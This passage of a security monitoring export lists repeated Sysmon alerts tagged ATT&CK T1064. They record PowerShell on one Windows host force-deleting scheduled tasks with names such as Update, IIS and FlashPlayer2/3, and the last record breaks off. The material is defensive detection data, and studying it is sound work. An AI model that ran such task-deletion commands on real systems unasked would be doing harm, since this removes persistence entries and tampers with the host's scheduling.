Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.161 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-00103e3e3100} +ProcessId: 7012 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.206566900Z"",""eventRecordID"":""3954"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.161\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-00103e3e3100}\r\nProcessId: 7012\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:40.161"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-00103e3e3100}"",""processId"":""7012"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.264",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.065 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-00102d3c3100} +ProcessId: 6248 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.070629700Z"",""eventRecordID"":""3953"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.065\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-00102d3c3100}\r\nProcessId: 6248\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:40.065"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-00102d3c3100}"",""processId"":""6248"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.247",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.970 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-0010423a3100} +ProcessId: 1348 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""System Log Security Check"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.981167300Z"",""eventRecordID"":""3952"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.970\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-0010423a3100}\r\nProcessId: 1348\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.970"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-0010423a3100}"",""processId"":""1348"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""System Log Security Check\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.232",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.896 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-001007383100} +ProcessId: 5944 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsLogTasks /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.902112300Z"",""eventRecordID"":""3951"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.896\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-001007383100}\r\nProcessId: 5944\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.896"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-001007383100}"",""processId"":""5944"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsLogTasks /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.216",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.847 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-001028363100} +ProcessId: 6784 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN IIS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN IIS /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.854220300Z"",""eventRecordID"":""3950"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.847\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-001028363100}\r\nProcessId: 6784\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN IIS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.847"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-001028363100}"",""processId"":""6784"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN IIS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.169",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.792 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-001058343100} +ProcessId: 168 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.797940300Z"",""eventRecordID"":""3949"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.792\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-001058343100}\r\nProcessId: 168\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.792"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-001058343100}"",""processId"":""168"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.480",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.735 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-001034323100} +ProcessId: 988 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 